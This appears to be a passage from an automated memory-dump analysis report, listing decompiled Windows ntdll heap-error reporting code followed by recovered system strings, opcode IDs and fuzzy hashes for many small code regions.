                                                                    					E0141B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				_push( *0x150589c);
                                                                    				E0141B150("Heap error detected at %p (heap handle %p)\n",  *0x15058a0);
                                                                    				_t27 =  *0x1505898; // 0x0
                                                                    				if(_t27 <= 0xf) {
                                                                    					switch( *((intOrPtr*)(_t27 * 4 +  &M014D1E96))) {
                                                                    						case 0:
                                                                    							_t105 = "heap_failure_internal";
                                                                    							goto L21;
                                                                    						case 1:
                                                                    							goto L21;
                                                                    						case 2:
                                                                    							goto L21;
                                                                    						case 3:
                                                                    							goto L21;
                                                                    						case 4:
                                                                    							goto L21;
                                                                    						case 5:
                                                                    							goto L21;
                                                                    						case 6:
                                                                    							goto L21;
                                                                    						case 7:
                                                                    							goto L21;
                                                                    						case 8:
                                                                    							goto L21;
                                                                    						case 9:
                                                                    							goto L21;
                                                                    						case 0xa:
                                                                    							goto L21;
                                                                    						case 0xb:
                                                                    							goto L21;
                                                                    						case 0xc:
                                                                    							goto L21;
                                                                    						case 0xd:
                                                                    							goto L21;
                                                                    						case 0xe:
                                                                    							goto L21;
                                                                    						case 0xf:
                                                                    							goto L21;
                                                                    					}
                                                                    				}
                                                                    				L21:
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0141B150();
                                                                    				} else {
                                                                    					E0141B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				_push(_t105);
                                                                    				E0141B150("Error code: %d - %s\n",  *0x1505898);
                                                                    				_t113 =  *0x15058a4; // 0x0
                                                                    				if(_t113 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0141B150();
                                                                    					} else {
                                                                    						E0141B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0141B150("Parameter1: %p\n",  *0x15058a4);
                                                                    				}
                                                                    				_t115 =  *0x15058a8; // 0x0
                                                                    				if(_t115 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0141B150();
                                                                    					} else {
                                                                    						E0141B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0141B150("Parameter2: %p\n",  *0x15058a8);
                                                                    				}
                                                                    				_t117 =  *0x15058ac; // 0x0
                                                                    				if(_t117 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0141B150();
                                                                    					} else {
                                                                    						E0141B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0141B150("Parameter3: %p\n",  *0x15058ac);
                                                                    				}
                                                                    				_t119 =  *0x15058b0; // 0x0
                                                                    				if(_t119 != 0) {
                                                                    					L41:
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0141B150();
                                                                    					} else {
                                                                    						E0141B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					_push( *0x15058b4);
                                                                    					E0141B150("Last known valid blocks: before - %p, after - %p\n",  *0x15058b0);
                                                                    				} else {
                                                                    					_t120 =  *0x15058b4; // 0x0
                                                                    					if(_t120 != 0) {
                                                                    						goto L41;
                                                                    					}
                                                                    				}
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0141B150();
                                                                    				} else {
                                                                    					E0141B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				return E0141B150("Stack trace available at %p\n", 0x15058c0);
                                                                    			}

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                    • API String ID: 0-2897834094
                                                                    • Opcode ID: 964bbce739156cfe8552618497ead3d2edc91ff713f8591b9968c49cfbc3cfb0
                                                                    • Instruction ID: f19dc59ed7b6c7245c59882b0f61a94ef8c04ab431949809efa19479aba9ca79
                                                                    • Opcode Fuzzy Hash: 964bbce739156cfe8552618497ead3d2edc91ff713f8591b9968c49cfbc3cfb0
                                                                    • Instruction Fuzzy Hash: 1C61C232521145DFEA12AB8BE495D2173B4EB19D30B1A843FFD096B371D73498529F0A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • Kernel-MUI-Language-SKU, xrefs: 01423F70
                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 01423E97
                                                                    • Kernel-MUI-Number-Allowed, xrefs: 01423D8C
                                                                    • Kernel-MUI-Language-Allowed, xrefs: 01423DC0
                                                                    • WindowsExcludedProcs, xrefs: 01423D6F
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                    • API String ID: 0-258546922
                                                                    • Opcode ID: f9fcab7afcfc66626957c3857458a7075efd7f3d03a49803b3563cf945ca4168
                                                                    • Instruction ID: f7e88dc5f54007d93d63b07cc4ebcc855b6fb9a9c40def1bf3aadc6c1a3eb918
                                                                    • Opcode Fuzzy Hash: f9fcab7afcfc66626957c3857458a7075efd7f3d03a49803b3563cf945ca4168
                                                                    • Instruction Fuzzy Hash: EFF14D72D00629EFCB11DF99C984AEFBBB9FF58650F15005BE905A7221D7349E41CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 0148933B, 01489367
                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0148932A
                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 01489357
                                                                    • LdrpFindDllActivationContext, xrefs: 01489331, 0148935D
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 0-3779518884
                                                                    • Opcode ID: 668ff99bfd426334844a41a93ba3ccd9a6ef2a5544126a2cbebba3a988db275f
                                                                    • Instruction ID: 20452a60f9f291281c09790130d6a770d7767c03b42614a63e061b0d7532a1be
                                                                    • Opcode Fuzzy Hash: 668ff99bfd426334844a41a93ba3ccd9a6ef2a5544126a2cbebba3a988db275f
                                                                    • Instruction Fuzzy Hash: 50412931A003179FFB36AADCC849A3776A5AB54678F26416FDA14D7371E770AC808381
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 01479C28
                                                                    • LdrpDoPostSnapWork, xrefs: 01479C1E
                                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01479C18
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 2994545307-1948996284
                                                                    • Opcode ID: 64e4f194ed839c4bdc77c80a96a5980e416cc96054c450318c1d0983f12c9d8a
                                                                    • Instruction ID: af5fa0cafa2ed75fe4f1026f491ed4c4acb9027601cbf86e3df66862d25511e2
                                                                    • Opcode Fuzzy Hash: 64e4f194ed839c4bdc77c80a96a5980e416cc96054c450318c1d0983f12c9d8a
                                                                    • Instruction Fuzzy Hash: 05911331A002279FEF18CF59C880ABE77F5FFA4314B85406FD901AB261E770A981CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • LdrpCompleteMapModule, xrefs: 01479898
                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 014798A2
                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 01479891
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                    • API String ID: 0-1676968949
                                                                    • Opcode ID: 92b03e55c3b39f7b493dc401563ba8b17d418a908fadc4ef115ce7a3c35ec98c
                                                                    • Instruction ID: ff1103c405d7bac45d068c8b6d6029377b1d20577f166359879d1e338f3a24a1
                                                                    • Opcode Fuzzy Hash: 92b03e55c3b39f7b493dc401563ba8b17d418a908fadc4ef115ce7a3c35ec98c
                                                                    • Instruction Fuzzy Hash: 4D5101716007469BEB22CB5DC844B6A7BA4FF24335F4505ABE9519B3F1D730E981CB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0141E68C
                                                                    • @, xrefs: 0141E6C0
                                                                    • InstallLanguageFallback, xrefs: 0141E6DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                    • API String ID: 0-1757540487
                                                                    • Opcode ID: 9afdc674460aa9cf08979233512fdf920bb30945e1070649362eb981bf87e44d
                                                                    • Instruction ID: 7bbf4f6b2bb674713883aa260f87982ffa1e59a31e7e88e56befe403bf075268
                                                                    • Opcode Fuzzy Hash: 9afdc674460aa9cf08979233512fdf920bb30945e1070649362eb981bf87e44d
                                                                    • Instruction Fuzzy Hash: 8A51A0766083069BD711DF29C440BABB7E8AF98614F04092FFA95EB360F734D904C7A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Legacy$UEFI
                                                                    • API String ID: 2994545307-634100481
                                                                    • Opcode ID: 2e21d47cd285e7604d66445d1e33508923f4b0359bfd43d42c0dacb8c0b07275
                                                                    • Instruction ID: 3b5a1f38a337fcbf25ccfae2ffdeafd5cb543ea0165c039ccee313d5d82f4a50
                                                                    • Opcode Fuzzy Hash: 2e21d47cd285e7604d66445d1e33508923f4b0359bfd43d42c0dacb8c0b07275
                                                                    • Instruction Fuzzy Hash: 0E515D71A006099FDF25DFA9C940AAEBBB8BB58704F24406FE649EB261D6719901CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0143B9A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 885266447-0
                                                                    • Opcode ID: f50dca5f8fd329008ca4850fd781903f9777fb8cda672dcb29a0457e38d088df
                                                                    • Instruction ID: 9726ba474e09f06d3783557b958dcbabd7ab92a1deec47667f9d5690bf67cf32
                                                                    • Opcode Fuzzy Hash: f50dca5f8fd329008ca4850fd781903f9777fb8cda672dcb29a0457e38d088df
                                                                    • Instruction Fuzzy Hash: B8517571A08701CFC721DF69C480A2BBBE5FBD8210F15896FEA9587365DB30E845CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _vswprintf_s
                                                                    • String ID:
                                                                    • API String ID: 677850445-0
                                                                    • Opcode ID: b481d7043cddef5d1201d7a43974e3e671a7b136aadc1bfcebbae77ad3002ea0
                                                                    • Instruction ID: 29bdaa1ebf871757f605eac1e01579fd862776ff1f856daf9c676287d445102b
                                                                    • Opcode Fuzzy Hash: b481d7043cddef5d1201d7a43974e3e671a7b136aadc1bfcebbae77ad3002ea0
                                                                    • Instruction Fuzzy Hash: DD51CFB5D002598EEB31CF78C844BFEBBB1AF04714F1941AEE859AB3A2D7704945CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PATH
                                                                    • API String ID: 0-1036084923
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0148BE0F
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                    • API String ID: 0-865735534
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Re-Waiting
                                                                    • API String ID: 0-316354757
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `
                                                                    • API String ID: 0-2679148245
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryHash
                                                                    • API String ID: 0-2202222882
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `
                                                                    • API String ID: 0-2679148245
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryName
                                                                    • API String ID: 0-215506332
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: WindowsExcludedProcs
                                                                    • API String ID: 0-3583428290
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Actx
                                                                    • API String ID: 0-89312691
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • Critical error detected %lx, xrefs: 014C8E21
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Critical error detected %lx
                                                                    • API String ID: 0-802127002
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 014AFF60
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                    • API String ID: 0-1911121157
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3eaed7a4a9d96fb4fdbd3369ad214fcf7366458c1f5dae96963f030129eb20f8
                                                                    • Instruction ID: 218d2db5d236d87cb344394046798b7817b1a1c4343e78b1d061fd396fc79cbe
                                                                    • Opcode Fuzzy Hash: 3eaed7a4a9d96fb4fdbd3369ad214fcf7366458c1f5dae96963f030129eb20f8
                                                                    • Instruction Fuzzy Hash: 6C51D176E001258FDB15CF5DD880DBEB7B1FB8870070A845BF8569B325D770AA51CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e07677b0eeb78c057c42f2c2e824ec1e2bacec50f24292507522b0eeea303bb1
                                                                    • Instruction ID: 745ad0f78b9bf877685c28ec468a09a431839f5c09b1131983f586de46a29df0
                                                                    • Opcode Fuzzy Hash: e07677b0eeb78c057c42f2c2e824ec1e2bacec50f24292507522b0eeea303bb1
                                                                    • Instruction Fuzzy Hash: C8519CB1E00606CFCB15DFA9C480AAEFBF1BB9C310F25815BD955AB364DB70A945CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                    • Instruction ID: 56a048d7757d2fa76cee191c24321ffc9dfd11f7e93e28be87a64f86c1d8ffee
                                                                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                    • Instruction Fuzzy Hash: 47510870E04255EFDB11CB69C1A0BEFBBF1AF05314F9881AAC54553362C379A9C9C751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                    • Instruction ID: 3b82ff8ac92d01d57572dea0b5ff2e342b253c623505f91b124d890ddf85b69b
                                                                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                    • Instruction Fuzzy Hash: 16517C71600646EFDB16CF58C884A96BBF5FF45316F1481BAE9089F222E371E946CBD0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d056b7368ca56407dd69c2c2ab72dac89a4d35c786ee52f75e066ffc8cb106a
                                                                    • Instruction ID: f0439a0872a2b1ced7baf798957d08c5c87bfd99b3b2ba02caf09d4828977723
                                                                    • Opcode Fuzzy Hash: 2d056b7368ca56407dd69c2c2ab72dac89a4d35c786ee52f75e066ffc8cb106a
                                                                    • Instruction Fuzzy Hash: A1513771A0021A9FEF25DF99D840E9EBBB5BB58350F14815AFD04AB260C3B19992CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0ace5b824e2783c11fbcbe8a89636e1e033c96c2048c559d229b57009ad27907
                                                                    • Instruction ID: 53f4675595d932257904cba63a62bd9bd783d6c486debc91911b6a974fa11693
                                                                    • Opcode Fuzzy Hash: 0ace5b824e2783c11fbcbe8a89636e1e033c96c2048c559d229b57009ad27907
                                                                    • Instruction Fuzzy Hash: E841C171A403189FFB32DF19CC80B6BB7A9EB54610F18009BE9499B3A1DB70DD44CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a520141c2a7158dfee0f95b077efc226865189e3c9efc5a95cc7d510f5d85b55
                                                                    • Instruction ID: 4443384c85aa5f891e782b8b84590ade2b6ceeb2e227c0537f490c74f37a9046
                                                                    • Opcode Fuzzy Hash: a520141c2a7158dfee0f95b077efc226865189e3c9efc5a95cc7d510f5d85b55
                                                                    • Instruction Fuzzy Hash: B541C931A002299BDB61EF68C940FEE77B4EF55700F0600ABE908AB361D774DE84CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 632405bcfb7e79d34a708fb864ba6e2110eff092e88351ff597b1b7cd0c1a736
                                                                    • Instruction ID: d84bfa0f228a0bedf94f27d1e0062c20a19f0c5f8694882af943102aac392e8d
                                                                    • Opcode Fuzzy Hash: 632405bcfb7e79d34a708fb864ba6e2110eff092e88351ff597b1b7cd0c1a736
                                                                    • Instruction Fuzzy Hash: EA4163B5A0023D9BDB24CF59C888AAEB7F4EB54300F5045EAE91997362DB709EC4CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 415fc6c66a477fd9df84eb989dd5bdfbaab42ede083e8d3bff5ef5c541ad6dbc
                                                                    • Instruction ID: 7c6656362b41b14aef22a2f2eaa8b1fcf6daeff401d8088b8d40b8fa0aa9d5e8
                                                                    • Opcode Fuzzy Hash: 415fc6c66a477fd9df84eb989dd5bdfbaab42ede083e8d3bff5ef5c541ad6dbc
                                                                    • Instruction Fuzzy Hash: 69419AB1D00209AFDB25CFAAC940BEEBBF4EF58704F05812FE914A7260DB799905CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2dfaab1b19bbe1b34872b936403126f33d9bf440380d69efa1ee3a7ee24729bc
                                                                    • Instruction ID: 498d474e103a402a31c04d24af5adc74ab79b7b0b04fc582d3346b1c6cc556c9
                                                                    • Opcode Fuzzy Hash: 2dfaab1b19bbe1b34872b936403126f33d9bf440380d69efa1ee3a7ee24729bc
                                                                    • Instruction Fuzzy Hash: 8D311632242711EBC7229B19C840BEA7BA5FF62720F10461FF8551F2B5E770F902CA90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 60c12b290d58f3aabac28e1d91168e2dfaf1493cbd2831732c57984e71a2fde2
                                                                    • Instruction ID: ae71495fd27a550d2319a32509ad7aecd6d40164e9b57a68ec34235ed4d3ee3e
                                                                    • Opcode Fuzzy Hash: 60c12b290d58f3aabac28e1d91168e2dfaf1493cbd2831732c57984e71a2fde2
                                                                    • Instruction Fuzzy Hash: C031CB31A006119BC7659F2EC841A6BBBF1FF95790B05806FE949CB362E630D842D790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e4e122acf63b1dfd875c028894d0b21d14bf35b05da577da41d793c749388c53
                                                                    • Instruction ID: e1a216e699aa63e4ced062eee7014bc3a34dbc9ea14fffcf7e950cd785634747
                                                                    • Opcode Fuzzy Hash: e4e122acf63b1dfd875c028894d0b21d14bf35b05da577da41d793c749388c53
                                                                    • Instruction Fuzzy Hash: 17417CB5A40205DFEB15CF98C480BAEBBF1BB99304F29806AE915AF364D774A941CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.716239904.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                    • Instruction ID: 10c18d7226d8e566be0d31ec50834e54245e038be481a5bc3b384bbd80a3d399
                                                                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                    • Instruction Fuzzy Hash: 83311471A01547AEDB05EBB5C890BEAFBA4BFAA200F04415FD41C57321DB346A4ADBE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
